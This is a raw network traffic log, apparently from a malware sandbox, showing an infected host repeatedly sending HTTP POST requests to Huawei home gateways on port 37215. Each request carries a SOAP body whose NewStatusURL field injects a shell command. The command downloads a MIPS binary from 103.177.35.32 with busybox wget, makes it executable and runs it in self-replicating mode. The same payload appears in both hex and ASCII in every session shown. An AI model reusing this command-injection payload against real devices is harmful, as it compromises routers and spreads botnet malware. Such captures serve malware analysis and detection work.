                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1166192.168.2.2334278157.12.242.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530412912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1167192.168.2.2333328157.21.169.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530459881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1168192.168.2.233443241.250.40.22037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530466080 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1169192.168.2.2339406197.229.85.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530478954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1170192.168.2.2342126157.142.125.23737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530492067 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1171192.168.2.235569423.115.184.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530513048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1172192.168.2.234540241.247.17.22837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530515909 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1173192.168.2.2360998197.54.224.17837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530563116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1174192.168.2.235138466.67.238.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530586958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1175192.168.2.2336174157.41.112.11437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530596018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
